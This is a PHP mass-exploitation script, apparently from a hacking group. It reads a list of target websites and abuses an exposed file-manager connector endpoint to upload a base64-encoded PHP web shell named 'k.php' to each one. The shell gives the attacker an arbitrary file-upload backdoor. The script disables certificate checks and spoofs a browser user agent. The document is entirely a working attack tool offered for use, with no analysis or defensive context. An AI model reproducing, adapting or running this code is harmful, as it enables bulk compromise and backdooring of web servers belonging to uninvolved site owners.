Hostinger Nazuka RCE file Upload Mass Exploiter

1. <?php
2.  
3. error_reporting(0);
4. set_time_limit(0);
5. echo '
6.  #--------------------------------------------#
7.  #          AZZATSSINS CYBERSERKERS           #
8.  #--------------------------------------------#
9. ';
10. function ngirim($url, $isi) {
11. $ch = curl_init ("$url");
12.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
13.       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
14.       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
15.       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
16.       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
17.       curl_setopt ($ch, CURLOPT_POST, 1);
18.       curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
19.       curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
20.       curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
21. $data3 = curl_exec ($ch);
22. return $data3;
23. }
24.  
25. $get=file_get_contents($argv[1])
26. or die("
27. \n\tError !
28. \n\tusage => php azzatssins.php target.txt\n\n");
29. $j=explode("\r\n",$get);
30. foreach($j as $site){
31.    
32. print "\n\n\t=> Checking : ".$site;
33. $korban = $site."/_file-manager/php/connector.php";
34.         $nama_doang = "k.php";
35.         $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
36.         $decode_isi = base64_decode($isi_nama_doang);
37.         $encode = base64_encode($nama_doang);
38.         $fp = fopen($nama_doang,"w");
39.         fputs($fp, $decode_isi);
40.         echo "\n";
41.         echo "# Upload[1] ......\n";
42.         $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw";
43.         $b = file_get_contents("$url_mkfile");
44.         $post1 = array(
45.                 "cmd" => "put",
46.                 "target" => "l1_$encode",
47.                 "content" => "$decode_isi",
48.                 );
49.         $post2 = array(
50.                 "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
51.                 "upload[]" => "@$nama_doang",);
52.         $output_mkfile = ngirim("$korban", $post1);
53.         if(preg_match("/$nama_doang/", $output_mkfile)) {
54.             echo "# Upload Success 1... => $nama_doang\n#\n\n";
55.         } else {
56.             echo "# Upload Failed 1 \n# Uploading 2..\n";
57.             $upload_ah = ngirim("$korban?cmd=upload", $post2);
58.             if(preg_match("/$nama_doang/", $upload_ah)) {
59.                 echo "# Upload Success 2 => $nama_doang\n#\n\n";
60.             } else {
61.                 echo "# Upload Failed 2\n\n";
62.             }
63.         }
64. }
65.  
66.  
67. ?>